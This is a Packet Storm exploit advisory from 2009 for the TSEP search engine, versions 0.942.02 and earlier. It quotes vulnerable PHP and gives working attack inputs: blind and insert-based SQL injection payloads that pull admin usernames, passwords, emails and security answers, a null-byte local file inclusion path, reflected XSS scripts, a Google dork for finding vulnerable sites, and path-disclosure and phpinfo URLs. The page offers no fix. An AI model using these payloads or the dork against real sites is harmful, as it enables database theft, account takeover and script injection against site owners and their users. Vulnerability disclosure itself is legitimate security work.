exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

TSEP 0.942.02 SQL Injection / XSS / Disclosure

TSEP 0.942.02 SQL Injection / XSS / Disclosure
Posted Jun 30, 2009
Authored by eLwaux

TSEP versions 0.942.02 and below suffer from cross site scripting, remote SQL injection, and information disclosure vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, info disclosure
SHA-256 | ff98b70495f71363b1c8c71708949c2ac88c8a2f3e6fb69fc5bbe81a685eda90

TSEP 0.942.02 SQL Injection / XSS / Disclosure

Change Mirror Download
TSEP <=0.942.02 Vulnerabilities
http://tsep.sourceforge.net

Dork: "powered by TSEP - The Search Engine Project"

(c)eLwaux 30.06.2009, uasc.org.ua


## ## ## ## ## ##

Blind SQL-Inj
/admin/rankform.php

-----------------------------------------------------------------------------
23: // Delete the contents
24: if ((isset ($_POST["delete"])) && (isset ($_POST["deleteRank"]))) {
25: $percent = $_POST['deleteRank'];
26: $sql_del = "DELETE FROM $db_tablename WHERE valuepercent='$percent'";
27:
28: mysql_query($sql_del);
29: }
-----------------------------------------------------------------------------

exploit (BlindSQLinj after DELETE):
POST: delete = .
POST: deleteRank = '{SQL}--

exploit2 (BlindSQLinj after UPDATE):
POST: modify = .
POST: modifyRank = .
POST: display = .
POST: comment = .
POST: alt = .
POST: percent = '{SQL}--




## ## ## ## ## ##

SQL-Inj
/admin/rankform.php

-----------------------------------------------------------------------------
54: if ((isset ($_POST["insert"])) && (isset ($_POST["insertNewRank"]))) {
55: $alt = $_POST['alt'];
56: $image_show = $_POST['image_show'];
57: $comment = $_POST['comment'];
58: $percent = $_POST['percent'];
59: $display = reslash($_POST['display']);
60:
61: if (($percent > "0") && ($percent <= "100")) {
62: $sql_ins = "INSERT INTO $db_tablename (alt_tag,display,valuepercent,image_show,comment)
63: VALUES ('$alt','$display','$percent','$image_show','$comment')";
64: mysql_query($sql_ins);
65: }
66: $sql_upd = "UPDATE $db_tablename SET image_show='$image_show'";
67: mysql_query($sql_upd);
68:
69: }
-----------------------------------------------------------------------------

exploit:
POST: insertNewRank = .
POST: insert = .
POST: percent = 1
POST: alt = 1',( select concat_ws(0x3a,username,passwd,email,question,answer) from tsep_users ),1,1,1);--
POST: image_show = 1
POST: comment = 1
POST: display = 1
then goto /admin/rankform.php and look admin name & passwd & email & question and answer



## ## ## ## ## ##

LFI
/admin/index.php

-----------------------------------------------------------------------------
335: if ( isset( $_POST ) and count( $_POST ) > 0 ) {
336: $_GET = $_POST;
337: }
338: if ( !isset($_GET["lang"]) )
339: if ( !isset($_SESSION["lang"]) )
340: $_GET["lang"] = "en_US";
341: else
342: $_GET["lang"] = $_SESSION["lang"];
345: if ( $_GET["lang"] != "en_US" )
345: require_once( "../language/" . $_GET["lang"] . "/language.php" );
-----------------------------------------------------------------------------

exploit:
GET: /admin/?lang=../{FILE.PHP}%00





## ## ## ## ## ##

Blind SQL-inj
/admin/indexoverview.php

-----------------------------------------------------------------------------
29: if (isset($_GET['order'])) // for userdefined search order, otherwise sort by time of entry: Title ASC
30: { // write new values
31: $db_tablename = $db_table_prefix."internal";
32: $query = "UPDATE $db_tablename SET stringvalue='".$_GET['order']."' WHERE description='tsepindexovervieworder'";
33: $result = mysql_query($query, $tsepdbconnection) or die(mysql_error());
34: $query = "UPDATE $db_tablename SET stringvalue='".$_GET['dir']."' WHERE description='tsepindexoverviewdirection'";
35: $result = mysql_query($query, $tsepdbconnection) or die(mysql_error());
36: }
-----------------------------------------------------------------------------

exploit:
GET: order = '+and+1=if(select+ascii(lower(substring(passwd,1,1)))>90+from+tsep_users+where+username='adminame',1,0)--





## ## ## ## ## ##

XSS
/admin/configuration.php

-----------------------------------------------------------------------------
137: <form name="tsepconfig" id="tsepconfig" method="post" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
154: <form name="frmMaxResultNew" id="frmMaxResultNew" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
164: <form name="frmMaxR....ckForm" id="frmMaxResult" method="POST" action="<?php echo $_SERVER["PHP_SELF"]; ?>">
-----------------------------------------------------------------------------

exploit:
GET: /configuration.php/"><script>alert(/xss/);</script><a%20"



## ## ## ## ## ##

XSS
/admin/index.php

-----------------------------------------------------------------------------
97: if ( isset( $_GET["errorMsg"] ) ) {
100: $html .= " <td class=\"errorMessage\">".addslashes( $_GET["errorMsg"] )."</td>\n";
107: unset( $_GET["errorMsg"] );
108: }
-----------------------------------------------------------------------------

exploit:
GET: /admin/?errorMsg=<script>alert(/xss/);</script>




## ## ## ## ## ##

Path disk:
-----------------------------------------------------------------------------
/admin/examples/phpcrawl4tsep.php
/admin/examples/fillwithcontent.php
/admin/examples/urllist.php
/include/indexingtimetaken.php
/include/timeneeded.php
/include/colorcycle.php
/include/dbconnection.php
/include/resultnumber.php
/include/copyright.php
/include/notifyofstopwords.php
/inclued/oldmysqltell.php
/include/indexstatus.php
/include/pagenavigation.php
/include/searchterm.php
/include/stampittimestamp.php
/include/ranking.php
/include/ipfunctions.php
/include/indexer_search_table.php
/include/printpagedetails.php
/include/deletefile.php
/include/uploadfile.php
/include/configfunctions.php
-----------------------------------------------------------------------------





## ## ## ## ## ##

PHPINFO:
-----------------------------------------------------------------------------
/admin/tsepinfo.php
-----------------------------------------------------------------------------




## ## ## ## ## ##

others's exploits:
/admin/configcontentimages.php/">{XSS}<"
/include/indexer_search_table.php?tsep_lng[help_copyright]=">{XSS}<"
/tsepsearch.php?q=sa&s=0&e=10&user_e=10/">{XSS}<a"
/tsepsearch.php?q={XSS}&s=0&e=10/&user_e=10


Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close